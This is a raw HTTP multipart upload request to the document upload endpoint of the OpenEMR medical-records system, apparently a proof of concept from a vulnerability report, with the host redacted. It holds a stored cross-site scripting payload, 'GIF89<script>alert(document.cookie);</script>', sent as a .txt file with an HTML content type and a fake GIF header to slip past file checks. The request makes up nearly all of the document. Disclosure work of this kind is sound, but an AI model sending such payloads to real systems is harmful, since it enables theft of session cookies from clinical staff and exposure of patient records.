POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
Host: REDACTED
(…snip…)
Upgrade-Insecure-Requests: 1
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=»MAX_FILE_SIZE»
64000000
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=»file[]»; filename=»1111.txt»
Content-Type: text/html
GIF89<script>alert(document.cookie);</script>
—————————–139184551113566022282519832587
Content-Disposition: form-data; name=»dicom_folder[]»; filename=»»
Content-Type: application/octet-stream
(…snip…)
—————————–139184551113566022282519832587–